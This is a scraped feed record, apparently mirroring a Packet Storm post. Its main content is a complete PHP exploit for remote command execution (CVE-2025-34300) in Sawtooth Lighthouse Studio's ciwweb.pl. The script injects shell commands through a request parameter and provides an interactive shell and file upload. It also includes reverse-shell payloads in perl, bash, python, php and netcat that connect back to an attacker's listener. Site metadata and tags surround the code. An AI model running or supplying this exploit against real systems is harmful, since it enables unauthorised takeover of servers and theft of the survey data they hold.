{“lastseen”:”2026-02-19T16:33:40″,”description”:”Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215864″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-34300″],”sourceData”:”=============================================================================================================================================\\n | # Title : Sawtooth Lighthouse Studio 9.16.14 RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/sawtoothsoftware.com |\\n =============================================================================================================================================\\n \\n [+] Summary : CVE-2025-34300 represents a critical Remote Code Execution (RCE) vulnerability in Sawtooth Software’s Lighthouse Studio survey platform, specifically affecting the ciwweb.pl web application component\\n \\n [+] POC :\\n \\n # Vulnerability Check\\n php exploit.php –url http:\/\/target.com –check\\n \\n # Command Execution\\n php exploit.php –url http:\/\/target.com –cmd \\”whoami\\”\\n \\n # Interactive Shell\\n php exploit.php –url http:\/\/target.com –shell\\n \\n # Reverse Shell\\n php exploit.php –url http:\/\/target.com –reverse –lhost YOUR_IP –lport 4444\\n \\n \\u003c?php\\n \\n \\n class CVE_2025_34300_Exploit {\\n \\n private $target_url;\\n private $timeout = 30;\\n private $proxy = null;\\n \\n public function __construct($target_url) {\\n $this-\\u003etarget_url = rtrim($target_url, ‘\/’);\\n }\\n \\n public function setProxy($proxy) {\\n $this-\\u003eproxy = $proxy;\\n }\\n \\n public function check() {\\n echo \\”[*] Checking target: {$this-\\u003etarget_url}\\\\n\\”;\\n \\n $params = [\\n ‘hid_javascript’ =\\u003e ‘1’\\n ];\\n \\n $response = $this-\\u003esendRequest(‘\/cgi-bin\/ciwweb.pl’, $params);\\n \\n if (!$response) {\\n echo \\”[-] No response from target\\\\n\\”;\\n return false;\\n }\\n \\n if (preg_match(‘\/Lighthouse Studio (\\\\d+_\\\\d+_\\\\d+)\/’, $response, $matches)) {\\n $version_str = str_replace(‘_’, ‘.’, $matches[1]);\\n echo \\”[+] Extracted version: {$version_str}\\\\n\\”;\\n \\n if (version_compare($version_str, ‘9.16.14’, ‘\\u003c’)) {\\n echo \\”[+] Target appears to be vulnerable!\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Target is patched (version \\u003e= 9.16.14)\\\\n\\”;\\n return false;\\n }\\n }\\n \\n if (strpos($response, ‘Lighthouse Studio’) !== false) {\\n echo \\”[+] Lighthouse Studio detected (version extraction failed)\\\\n\\”;\\n return true;\\n }\\n \\n echo \\”[-] Lighthouse Studio not detected\\\\n\\”;\\n return false;\\n }\\n \\n public function executeCommand($command) {\\n echo \\”[*] Attempting to execute command: {$command}\\\\n\\”;\\n $encoded_cmd = urlencode($command);\\n $params = [\\n ‘hid_javascript’ =\\u003e ‘1’,\\n ‘hid_Random_ACARAT’ =\\u003e ‘[%`’ . $command . ‘`%]’\\n ];\\n \\n $response = $this-\\u003esendRequest(‘\/cgi-bin\/ciwweb.pl’, $params);\\n \\n if (!$response) {\\n echo \\”[-] No response received\\\\n\\”;\\n return null;\\n }\\n \\n if (preg_match(‘\/\\\\[\\\\%`(.*?)`\\\\%\\\\]\/s’, $response, $matches)) {\\n $output = $matches[1];\\n echo \\”[+] Command output:\\\\n\\”;\\n echo $output . \\”\\\\n\\”;\\n return $output;\\n }\\n \\n echo \\”[-] No command output found in response\\\\n\\”;\\n \\n if (strpos($response, ‘Cannot find the study name’) !== false) {\\n echo \\”[-] Invalid STUDYNAME parameter\\\\n\\”;\\n }\\n \\n return null;\\n }\\n \\n public function reverseShell($lhost, $lport) {\\n $payloads = [\\n ‘perl’ =\\u003e \\”perl -e ‘use Socket;\\\\$i=\\\\\\”$lhost\\\\\\”;\\\\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\\\\”tcp\\\\\\”));if(connect(S,sockaddr_in(\\\\$p,inet_aton(\\\\$i)))){open(STDIN,\\\\\\”\\u003e\\u0026S\\\\\\”);open(STDOUT,\\\\\\”\\u003e\\u0026S\\\\\\”);open(STDERR,\\\\\\”\\u003e\\u0026S\\\\\\”);exec(\\\\\\”\/bin\/sh -i\\\\\\”);};’\\”,\\n ‘bash’ =\\u003e \\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/$lhost\/$lport 0\\u003e\\u00261’\\”,\\n ‘python’ =\\u003e \\”python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”$lhost\\\\\\”,$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”]);’\\”,\\n ‘php’ =\\u003e \\”php -r ‘\\\\$sock=fsockopen(\\\\\\”$lhost\\\\\\”,$lport);exec(\\\\\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\”);’\\”,\\n ‘nc’ =\\u003e \\”nc -e \/bin\/sh $lhost $lport || nc -c sh $lhost $lport || rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2\\u003e\\u00261|nc $lhost $lport \\u003e\/tmp\/f\\”\\n ];\\n \\n echo \\”[*] Available reverse shell payloads:\\\\n\\”;\\n foreach (array_keys($payloads) as $i =\\u003e $type) {\\n echo \\” [{$i}] {$type}\\\\n\\”;\\n }\\n \\n echo \\”Select payload type: \\”;\\n $choice = trim(fgets(STDIN));\\n $types = array_keys($payloads);\\n \\n if (isset($types[$choice])) {\\n $type = $types[$choice];\\n $cmd = $payloads[$type];\\n echo \\”[*] Using {$type} reverse shell\\\\n\\”;\\n return $this-\\u003eexecuteCommand($cmd);\\n }\\n \\n return null;\\n }\\n \\n public function uploadFile($local_file, $remote_path) {\\n if (!file_exists($local_file)) {\\n echo \\”[-] Local file not found: {$local_file}\\\\n\\”;\\n return false;\\n }\\n \\n $content = file_get_contents($local_file);\\n $encoded = base64_encode($content);\\n $commands = [\\n ‘linux’ =\\u003e \\”echo ‘{$encoded}’ | base64 -d \\u003e {$remote_path} \\u0026\\u0026 chmod +x {$remote_path}\\”,\\n ‘windows’ =\\u003e \\”powershell -Command \\\\\\”[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(‘{$encoded}’)) | Out-File -FilePath ‘{$remote_path}’\\\\\\”\\”\\n ];\\n \\n echo \\”[*] Attempting Linux file upload…\\\\n\\”;\\n $result = $this-\\u003eexecuteCommand($commands[‘linux’]);\\n \\n if ($result === null) {\\n echo \\”[*] Attempting Windows file upload…\\\\n\\”;\\n $result = $this-\\u003eexecuteCommand($commands[‘windows’]);\\n }\\n \\n return $result !== null;\\n }\\n \\n private function sendRequest($path, $params = []) {\\n $url = $this-\\u003etarget_url . $path;\\n \\n if (!empty($params)) {\\n $url .= ‘?’ . http_build_query($params);\\n }\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ]);\\n \\n if ($this-\\u003eproxy) {\\n curl_setopt($ch, CURLOPT_PROXY, $this-\\u003eproxy);\\n }\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n if (curl_errno($ch)) {\\n echo \\”[-] cURL error: \\” . curl_error($ch) . \\”\\\\n\\”;\\n curl_close($ch);\\n return false;\\n }\\n \\n curl_close($ch);\\n \\n if ($http_code != 200) {\\n echo \\”[-] HTTP {$http_code} received\\\\n\\”;\\n return false;\\n }\\n \\n return $response;\\n }\\n \\n public function interactiveShell() {\\n if (!$this-\\u003echeck()) {\\n echo \\”[-] Target not vulnerable or check failed\\\\n\\”;\\n return;\\n }\\n \\n echo \\”[*] Starting interactive shell (type ‘exit’ to quit)\\\\n\\”;\\n \\n while (true) {\\n echo \\”cmd\\u003e \\”;\\n $cmd = trim(fgets(STDIN));\\n \\n if (empty($cmd)) {\\n continue;\\n }\\n \\n if (strtolower($cmd) == ‘exit’ || strtolower($cmd) == ‘quit’) {\\n break;\\n }\\n \\n $this-\\u003eexecuteCommand($cmd);\\n }\\n }\\n }\\n \\n function showHelp() {\\n echo \\”by indoushka Exploit – Sawtooth Lighthouse Studio RCE\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” php exploit.php –check –url http:\/\/target.com\\\\n\\”;\\n echo \\” php exploit.php –cmd \\\\\\”whoami\\\\\\” –url http:\/\/target.com\\\\n\\”;\\n echo \\” php exploit.php –shell –url http:\/\/target.com\\\\n\\”;\\n echo \\” php exploit.php –reverse –lhost 1.2.3.4 –lport 4444 –url http:\/\/target.com\\\\n\\”;\\n echo \\”\\\\nOptions:\\\\n\\”;\\n echo \\” –url Target URL (required)\\\\n\\”;\\n echo \\” –check Check if vulnerable\\\\n\\”;\\n echo \\” –cmd Execute single command\\\\n\\”;\\n echo \\” –shell Start interactive shell\\\\n\\”;\\n echo \\” –reverse Start reverse shell\\\\n\\”;\\n echo \\” –lhost Listener IP for reverse shell\\\\n\\”;\\n echo \\” –lport Listener port for reverse shell\\\\n\\”;\\n echo \\” –proxy HTTP proxy (optional)\\\\n\\”;\\n echo \\” –upload Upload file: –upload local.txt,\/remote\/path.txt\\\\n\\”;\\n }\\n \\n if (php_sapi_name() === ‘cli’) {\\n $options = getopt(”, [\\n ‘url:’,\\n ‘check’,\\n ‘cmd:’,\\n ‘shell’,\\n ‘reverse’,\\n ‘lhost:’,\\n ‘lport:’,\\n ‘proxy:’,\\n ‘upload:’,\\n ‘help’\\n ]);\\n \\n if (isset($options[‘help’]) || !isset($options[‘url’])) {\\n showHelp();\\n exit();\\n }\\n \\n $exploit = new CVE_2025_34300_Exploit($options[‘url’]);\\n \\n if (isset($options[‘proxy’])) {\\n $exploit-\\u003esetProxy($options[‘proxy’]);\\n }\\n \\n if (isset($options[‘check’])) {\\n $exploit-\\u003echeck();\\n } elseif (isset($options[‘cmd’])) {\\n $exploit-\\u003echeck();\\n $exploit-\\u003eexecuteCommand($options[‘cmd’]);\\n } elseif (isset($options[‘shell’])) {\\n $exploit-\\u003einteractiveShell();\\n } elseif (isset($options[‘reverse’])) {\\n if (!isset($options[‘lhost’]) || !isset($options[‘lport’])) {\\n echo \\”[-] –lhost and –lport required for reverse shell\\\\n\\”;\\n exit(1);\\n }\\n $exploit-\\u003echeck();\\n $exploit-\\u003ereverseShell($options[‘lhost’], $options[‘lport’]);\\n } elseif (isset($options[‘upload’])) {\\n list($local, $remote) = explode(‘,’, $options[‘upload’], 2);\\n $exploit-\\u003echeck();\\n $exploit-\\u003euploadFile($local, $remote);\\n }\\n } else {\\n echo \\”This script is designed for command line use.\\\\n\\”;\\n showHelp();\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215864″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215864\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-19T16:33:40″,”description”:”Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215864″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-34300″],”sourceData”:”=============================================================================================================================================\\n | # Title : Sawtooth Lighthouse…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-41670","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n